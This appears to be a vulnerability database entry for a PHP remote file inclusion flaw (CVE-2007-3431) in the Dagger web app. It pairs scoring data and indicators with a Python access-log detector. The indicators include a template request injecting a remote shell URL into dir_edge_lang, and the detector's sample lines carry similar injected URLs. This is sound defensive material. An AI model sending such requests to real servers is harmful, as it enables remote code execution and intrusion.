CVE-2007-3431
published 2007-06-27

Priority: P355, medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 70.72% (99.3th percentile)

PHP remote file inclusion vulnerability in cal.func.php in Valerio Capello Dagger - The Cutting Edge r23jan2007 allows remote attackers to execute arbitrary PHP code via a URL in the dir_edge_lang parameter.

Affected

1 range
Vendor | Product | Version range | Fixed in
valerio_capello | dagger_the_cutting_edge | |

Detection & IOCs (extracted from sources)

path: cal.func.php
url: http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.zip
command: http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]
  • Monitor HTTP requests targeting cal.func.php with a URL-like value in the dir_edge_lang query parameter, which is the RFI injection point.
  • The vulnerable code path is the include() call in cal.func.php that directly concatenates the unsanitised dir_edge_lang parameter: include($dir_edge_lang.'cal_lang.inc.php'); — any external URL supplied here will be fetched and executed.
  • Exploitation requires allow_url_include (and allow_url_fopen) to be enabled in the PHP configuration; without it the remote file inclusion cannot fetch an external shell.
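
The monitoring rule from the first bullet, as an added example (not part of the original entry or of the affected project): it scans web access-log lines for requests to cal.func.php whose dir_edge_lang value decodes to a scheme:// URL, including percent-encoded and mixed-case forms. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "dir_edge_lang"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(r"(?:^|/)cal\.func\.php(?:/|$)")
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # "scheme://", any scheme

# Constructed sample lines (documentation addresses, example.invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2007:10:00:01 +0000] "GET /dagger/cal.func.php'
    '?dir_edge_lang=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Jun/2007:10:00:02 +0000] "GET /dagger/cal.func.php'
    '?dir_edge_lang=hTTp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [27/Jun/2007:10:00:03 +0000] "GET /dagger/cal.func.php'
    '?dir_edge_lang=lang/en/ HTTP/1.1" 200 2048',
    '192.0.2.13 - - [27/Jun/2007:10:00:04 +0000] "GET /index.php'
    '?dir_edge_lang=http://example.invalid/x HTTP/1.1" 404 0',
]

def suspicious_value(target):
    """Return the decoded dir_edge_lang value if it is URL-like, else None."""
    parts = urlsplit(target)
    # Only requests for cal.func.php (case-insensitive, path decoded) count.
    if not SCRIPT_RE.search(unquote(parts.path).lower()):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        for _ in range(2):  # undo extra layers of percent-encoding
            value = unquote(value)
        if URL_RE.match(value.strip()):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        value = suspicious_value(m.group("target")) if m else None
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} {PARAM}={value!r}")
```

The local-path request and the request to a different script are not flagged, so the rule alerts only on the injection point named above.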